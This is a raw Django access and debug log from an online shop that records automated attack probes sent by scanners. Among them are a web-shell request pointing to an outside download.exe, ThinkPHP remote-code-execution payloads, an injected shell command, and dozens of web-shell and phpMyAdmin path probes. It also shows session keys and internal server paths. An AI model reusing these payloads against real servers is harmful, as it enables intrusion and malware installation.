"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) Not Found: /solr/ [17/Dec/2019 16:45:26] "GET /solr/ HTTP/1.0" 404 1724 Not Found: /manager/text/list [17/Dec/2019 16:48:00] "GET /manager/text/list HTTP/1.0" 404 6471 [17/Dec/2019 16:51:26] "GET / HTTP/1.0" 302 0 [17/Dec/2019 16:58:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:03:46] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:10:04] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:15:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:20:09] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:25:12] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:30:15] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:36:10] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:38:51] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:41:12] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:46:15] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:51:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 17:56:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:01:53] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:10:04] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:15:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:21:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 18:23:55] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [17/Dec/2019 18:23:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=177 HTTP/1.0" 404 6532 Not Found: /newslist.asp [17/Dec/2019 18:23:58] "GET /newslist.asp?type=4&id=1326 HTTP/1.0" 404 6476 [17/Dec/2019 18:26:56] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:31:57] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:32:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 18:32:17,096 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a9fnoj867i7vwrjvmfcwne9l96aof0pd' LIMIT 1; args=('a9fnoj867i7vwrjvmfcwne9l96aof0pd',) DEBUG 2019-12-17 18:32:17,099 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a9fnoj867i7vwrjvmfcwne9l96aof0pd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T18:32:17.097465+00:00'::timestamptz); args=('a9fnoj867i7vwrjvmfcwne9l96aof0pd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 18, 32, 17, 97465, tzinfo=)) [17/Dec/2019 18:32:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 18:36:59] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 18:40:38] "GET /robots.txt HTTP/1.0" 404 6451 [17/Dec/2019 18:43:57] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:49:00] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:54:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 18:59:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:17:42] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:22:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 19:22:07,419 utils 4252 140031747061504 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'skax1wcu1ya8y8j1ncdx7la4oj1j7rzh' LIMIT 1; args=('skax1wcu1ya8y8j1ncdx7la4oj1j7rzh',) DEBUG 2019-12-17 19:22:07,421 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('skax1wcu1ya8y8j1ncdx7la4oj1j7rzh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T19:22:07.420316+00:00'::timestamptz); args=('skax1wcu1ya8y8j1ncdx7la4oj1j7rzh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 19, 22, 7, 420316, tzinfo=)) [17/Dec/2019 19:22:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 19:22:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:27:48] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:29:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:32:51] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:39:08] "GET / HTTP/1.0" 302 0 Not Found: /FxCodeShell.jsp::$DATA [17/Dec/2019 19:47:50] "PUT /FxCodeShell.jsp::$DATA HTTP/1.0" 404 6486 Not Found: /FxCodeShell.jsp/ [17/Dec/2019 19:47:50] "PUT /FxCodeShell.jsp/ HTTP/1.0" 404 6468 Not Found: /FxCodeShell.jsp [17/Dec/2019 19:47:50] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fk.openyourass.club/download.exe HTTP/1.0" 404 6550 [17/Dec/2019 19:47:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 19:52:57] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 19:54:57] "HEAD /robots.txt HTTP/1.0" 404 6454 [17/Dec/2019 19:58:00] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [17/Dec/2019 20:04:56] "GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin HTTP/1.0" 404 6516 [17/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:15:00] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [17/Dec/2019 20:23:04] "GET /proxy.php HTTP/1.0" 404 6456 [17/Dec/2019 20:28:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:31:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:33:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 20:35:36,761 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'resfx'; args=('resfx',) Not Found: /resfx/ [17/Dec/2019 20:35:36] "GET /resfx/ HTTP/1.0" 404 1727 [17/Dec/2019 20:39:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:44:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:49:31] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 20:54:56] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:57:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 20:59:59] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [17/Dec/2019 21:12:47] "POST /editBlackAndWhiteList HTTP/1.0" 500 63898 [17/Dec/2019 21:15:07] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 21:20:10] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [17/Dec/2019 21:22:59] "GET /proxy.php HTTP/1.0" 404 6456 [17/Dec/2019 21:25:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:34:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:41:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:46:19] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:51:22] "GET / HTTP/1.0" 302 0 [17/Dec/2019 21:56:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [17/Dec/2019 22:13:44] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [17/Dec/2019 22:13:45] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [17/Dec/2019 22:13:45] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [17/Dec/2019 22:13:46] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [17/Dec/2019 22:13:47] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [17/Dec/2019 22:13:48] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [17/Dec/2019 22:13:48] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [17/Dec/2019 22:13:48] "GET /index.php HTTP/1.0" 404 6447 [17/Dec/2019 22:13:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 22:13:49,968 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y956nkxxsb02krfzkjl74g7n4si6i6ez' LIMIT 1; args=('y956nkxxsb02krfzkjl74g7n4si6i6ez',) DEBUG 2019-12-17 22:13:49,970 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y956nkxxsb02krfzkjl74g7n4si6i6ez', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T22:13:49.968930+00:00'::timestamptz); args=('y956nkxxsb02krfzkjl74g7n4si6i6ez', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 22, 13, 49, 968930, tzinfo=)) [17/Dec/2019 22:13:49] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 22:14:07] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:19:10] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:24:12] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 22:27:57] "GET /robots.txt HTTP/1.0" 404 6450 [17/Dec/2019 22:27:57] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 22:27:58,320 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't1p7acyrgamp3eo6kxsbp44farnp12du' LIMIT 1; args=('t1p7acyrgamp3eo6kxsbp44farnp12du',) DEBUG 2019-12-17 22:27:58,323 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t1p7acyrgamp3eo6kxsbp44farnp12du', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T22:27:58.321553+00:00'::timestamptz); args=('t1p7acyrgamp3eo6kxsbp44farnp12du', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 22, 27, 58, 321553, tzinfo=)) [17/Dec/2019 22:27:58] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 22:29:15] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:34:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:39:21] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:48:27] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:48:40] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 22:51:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:53:30] "GET / HTTP/1.0" 302 0 [17/Dec/2019 22:58:32] "GET / HTTP/1.0" 302 0 Not Found: /index.html#jbm3 [17/Dec/2019 22:59:06] "GET /index.html#jbm3 HTTP/1.0" 404 6467 [17/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [17/Dec/2019 23:14:31] "GET /manager/html HTTP/1.0" 404 6456 [17/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:20:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:25:23] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:31:12] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:36:15] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:43:46] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:48:49] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 23:53:48] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [17/Dec/2019 23:53:51] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=178 HTTP/1.0" 404 6532 Not Found: /newslist.asp [17/Dec/2019 23:53:53] "GET /newslist.asp?type=4&id=1274 HTTP/1.0" 404 6476 [17/Dec/2019 23:54:28] "GET / HTTP/1.0" 302 0 [17/Dec/2019 23:59:44] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 00:01:36] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:11:49] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:16:52] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:21:55] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:26:58] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [18/Dec/2019 00:34:33] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:39:35] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:44:39] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:50:36] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:55:50] "GET / HTTP/1.0" 302 0 [18/Dec/2019 00:59:12] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [18/Dec/2019 01:06:30] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [18/Dec/2019 01:06:30] "GET /robots.txt HTTP/1.0" 404 6450 Not Found: /Adminb5512046/Login.php [18/Dec/2019 01:06:33] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6490 [18/Dec/2019 01:06:33] "GET / HTTP/1.0" 302 0 Not Found: /l.php [18/Dec/2019 01:06:33] "GET /l.php HTTP/1.0" 404 6435 Not Found: /phpinfo.php [18/Dec/2019 01:06:33] "GET /phpinfo.php HTTP/1.0" 404 6453 Not Found: /test.php [18/Dec/2019 01:06:34] "GET /test.php HTTP/1.0" 404 6444 Not Found: /index.php [18/Dec/2019 01:06:34] "POST /index.php HTTP/1.0" 404 6448 Not Found: /bbs.php [18/Dec/2019 01:06:34] "POST /bbs.php HTTP/1.0" 404 6442 Not Found: /forum.php [18/Dec/2019 01:06:34] "POST /forum.php HTTP/1.0" 404 6448 Not Found: /forums.php [18/Dec/2019 01:06:34] "POST /forums.php HTTP/1.0" 404 6451 Not Found: /bbs/index.php [18/Dec/2019 01:06:34] "POST /bbs/index.php HTTP/1.0" 404 6460 Not Found: /forum/index.php [18/Dec/2019 01:06:37] "POST /forum/index.php HTTP/1.0" 404 6466 Not Found: /forums/index.php [18/Dec/2019 01:06:37] "POST /forums/index.php HTTP/1.0" 404 6469 DEBUG 2019-12-18 01:06:37,872 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [18/Dec/2019 01:06:37] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [18/Dec/2019 01:06:38] "GET /help.php HTTP/1.0" 404 6444 Not Found: /java.php [18/Dec/2019 01:06:38] "GET /java.php HTTP/1.0" 404 6444 Not Found: /_query.php [18/Dec/2019 01:06:38] "GET /_query.php HTTP/1.0" 404 6450 Not Found: /test.php [18/Dec/2019 01:06:38] "GET /test.php HTTP/1.0" 404 6444 Not Found: /db_cts.php [18/Dec/2019 01:06:38] "GET /db_cts.php HTTP/1.0" 404 6450 Not Found: /db_pma.php [18/Dec/2019 01:06:38] "GET /db_pma.php HTTP/1.0" 404 6450 Not Found: /logon.php [18/Dec/2019 01:06:38] "GET /logon.php HTTP/1.0" 404 6447 Not Found: /help-e.php [18/Dec/2019 01:06:38] "GET /help-e.php HTTP/1.0" 404 6450 Not Found: /license.php [18/Dec/2019 01:06:39] "GET /license.php HTTP/1.0" 404 6453 Not Found: /log.php [18/Dec/2019 01:06:39] "GET /log.php HTTP/1.0" 404 6441 Not Found: /hell.php [18/Dec/2019 01:06:39] "GET /hell.php HTTP/1.0" 404 6444 Not Found: /pmd_online.php [18/Dec/2019 01:06:39] "GET /pmd_online.php HTTP/1.0" 404 6462 Not Found: /x.php [18/Dec/2019 01:06:39] "GET /x.php HTTP/1.0" 404 6435 Not Found: /shell.php [18/Dec/2019 01:06:39] "GET /shell.php HTTP/1.0" 404 6447 Not Found: /htdocs.php [18/Dec/2019 01:06:41] "GET /htdocs.php HTTP/1.0" 404 6450 Not Found: /b.php [18/Dec/2019 01:06:41] "GET /b.php HTTP/1.0" 404 6435 Not Found: /sane.php [18/Dec/2019 01:06:41] "GET /sane.php HTTP/1.0" 404 6444 Not Found: /desktop.ini.php [18/Dec/2019 01:06:42] "GET /desktop.ini.php HTTP/1.0" 404 6465 Not Found: /z.php [18/Dec/2019 01:06:42] "GET /z.php HTTP/1.0" 404 6435 Not Found: /lala.php [18/Dec/2019 01:06:42] "GET /lala.php HTTP/1.0" 404 6444 Not Found: /lala-dpr.php [18/Dec/2019 01:06:42] "GET /lala-dpr.php HTTP/1.0" 404 6456 Not Found: /wpc.php [18/Dec/2019 01:06:42] "GET /wpc.php HTTP/1.0" 404 6441 Not Found: /wpo.php [18/Dec/2019 01:06:42] "GET /wpo.php HTTP/1.0" 404 6441 Not Found: /t6nv.php [18/Dec/2019 01:06:42] "GET /t6nv.php HTTP/1.0" 404 6444 Not Found: /muhstik.php [18/Dec/2019 01:06:43] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /text.php [18/Dec/2019 01:06:43] "GET /text.php HTTP/1.0" 404 6444 Not Found: /wp-config.php [18/Dec/2019 01:06:43] "GET /wp-config.php HTTP/1.0" 404 6459 Not Found: /muhstik.php [18/Dec/2019 01:06:43] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /muhstik2.php [18/Dec/2019 01:06:43] "GET /muhstik2.php HTTP/1.0" 404 6456 Not Found: /muhstiks.php [18/Dec/2019 01:06:43] "GET /muhstiks.php HTTP/1.0" 404 6456 Not Found: /muhstik-dpr.php [18/Dec/2019 01:06:43] "GET /muhstik-dpr.php HTTP/1.0" 404 6465 Not Found: /lol.php [18/Dec/2019 01:06:44] "GET /lol.php HTTP/1.0" 404 6441 Not Found: /uploader.php [18/Dec/2019 01:06:44] "GET /uploader.php HTTP/1.0" 404 6456 Not Found: /cmd.php [18/Dec/2019 01:06:44] "GET /cmd.php HTTP/1.0" 404 6441 Not Found: /cmv.php [18/Dec/2019 01:06:44] "GET /cmv.php HTTP/1.0" 404 6441 Not Found: /cmdd.php [18/Dec/2019 01:06:44] "GET /cmdd.php HTTP/1.0" 404 6444 Not Found: /knal.php [18/Dec/2019 01:06:44] "GET /knal.php HTTP/1.0" 404 6444 Not Found: /cmd.php [18/Dec/2019 01:06:44] "GET /cmd.php HTTP/1.0" 404 6441 Not Found: /shell.php [18/Dec/2019 01:06:45] "GET /shell.php HTTP/1.0" 404 6447 Not Found: /appserv.php [18/Dec/2019 01:06:45] "GET /appserv.php HTTP/1.0" 404 6453 Not Found: /scripts/setup.php [18/Dec/2019 01:06:45] "GET /scripts/setup.php HTTP/1.0" 404 6471 Not Found: /phpmyadmin/scripts/setup.php [18/Dec/2019 01:06:45] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /phpMyAdmin/scripts/setup.php [18/Dec/2019 01:06:46] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /scripts/db___.init.php [18/Dec/2019 01:06:46] "GET /scripts/db___.init.php HTTP/1.0" 404 6486 Not Found: /phpmyadmin/scripts/db___.init.php [18/Dec/2019 01:06:46] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6519 Not Found: /phpMyAdmin/scripts/db___.init.php [18/Dec/2019 01:06:46] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6519 Not Found: /pma/scripts/setup.php [18/Dec/2019 01:06:47] "GET /pma/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /PMA/scripts/setup.php [18/Dec/2019 01:06:47] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /myadmin/scripts/setup.php [18/Dec/2019 01:06:47] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /MyAdmin/scripts/setup.php [18/Dec/2019 01:06:47] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /pma/scripts/db___.init.php [18/Dec/2019 01:06:47] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /PMA/scripts/db___.init.php [18/Dec/2019 01:06:47] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /myadmin/scripts/db___.init.php [18/Dec/2019 01:06:47] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /MyAdmin/scripts/db___.init.php [18/Dec/2019 01:06:48] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /plugins/weathermap/editor.php [18/Dec/2019 01:06:48] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6507 Not Found: /cacti/plugins/weathermap/editor.php [18/Dec/2019 01:06:48] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6525 Not Found: /weathermap/editor.php [18/Dec/2019 01:06:48] "GET /weathermap/editor.php HTTP/1.0" 404 6483 Not Found: /index.php [18/Dec/2019 01:06:48] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6694 Not Found: /elrekt.php [18/Dec/2019 01:06:48] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6697 DEBUG 2019-12-18 01:06:49,215 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [18/Dec/2019 01:06:49] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [18/Dec/2019 01:06:49] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6598 Not Found: /index.php [18/Dec/2019 01:06:49] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6503 [18/Dec/2019 01:06:49] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [18/Dec/2019 01:06:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 01:06:49,777 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [18/Dec/2019 01:06:49] "GET /joomla/ HTTP/1.0" 404 1728 [18/Dec/2019 01:06:53] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [18/Dec/2019 01:06:53] "GET /d7.php HTTP/1.0" 404 6438 Not Found: /rxr.php [18/Dec/2019 01:06:53] "GET /rxr.php HTTP/1.0" 404 6441 Not Found: /1x.php [18/Dec/2019 01:06:53] "GET /1x.php HTTP/1.0" 404 6438 Not Found: /home.php [18/Dec/2019 01:06:54] "GET /home.php HTTP/1.0" 404 6444 Not Found: /undx.php [18/Dec/2019 01:06:54] "GET /undx.php HTTP/1.0" 404 6444 Not Found: /spider.php [18/Dec/2019 01:06:54] "GET /spider.php HTTP/1.0" 404 6450 Not Found: /payload.php [18/Dec/2019 01:06:54] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /composers.php [18/Dec/2019 01:06:54] "GET /composers.php HTTP/1.0" 404 6459 Not Found: /izom.php [18/Dec/2019 01:06:54] "GET /izom.php HTTP/1.0" 404 6444 Not Found: /composer.php [18/Dec/2019 01:06:54] "GET /composer.php HTTP/1.0" 404 6456 Not Found: /hue2.php [18/Dec/2019 01:06:57] "GET /hue2.php HTTP/1.0" 404 6444 Not Found: /Drupal.php [18/Dec/2019 01:06:57] "GET /Drupal.php HTTP/1.0" 404 6450 Not Found: /lang.php [18/Dec/2019 01:06:57] "GET /lang.php?f=1 HTTP/1.0" 404 6448 Not Found: /izom.php [18/Dec/2019 01:06:58] "GET /izom.php HTTP/1.0" 404 6444 Not Found: /payload.php [18/Dec/2019 01:06:58] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /new_license.php [18/Dec/2019 01:06:58] "GET /new_license.php HTTP/1.0" 404 6465 Not Found: /images/!.php [18/Dec/2019 01:06:58] "GET /images/!.php HTTP/1.0" 404 6456 Not Found: /images/vuln.php [18/Dec/2019 01:06:58] "GET /images/vuln.php HTTP/1.0" 404 6465 Not Found: /hd.php [18/Dec/2019 01:06:58] "GET /hd.php HTTP/1.0" 404 6438 Not Found: /images/up.php [18/Dec/2019 01:06:58] "GET /images/up.php HTTP/1.0" 404 6459 Not Found: /images/attari.php [18/Dec/2019 01:07:01] "GET /images/attari.php HTTP/1.0" 404 6471 Not Found: /images/jsspwneed.php [18/Dec/2019 01:07:01] "GET /images/jsspwneed.php HTTP/1.0" 404 6480 Not Found: /images/stories/cmd.php [18/Dec/2019 01:07:01] "GET /images/stories/cmd.php HTTP/1.0" 404 6486 Not Found: /images/stories/filemga.php [18/Dec/2019 01:07:02] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6509 Not Found: /up.php [18/Dec/2019 01:07:02] "GET /up.php HTTP/1.0" 404 6438 Not Found: /laravel.php [18/Dec/2019 01:07:02] "GET /laravel.php HTTP/1.0" 404 6453 Not Found: /huoshan.php [18/Dec/2019 01:07:02] "GET /huoshan.php 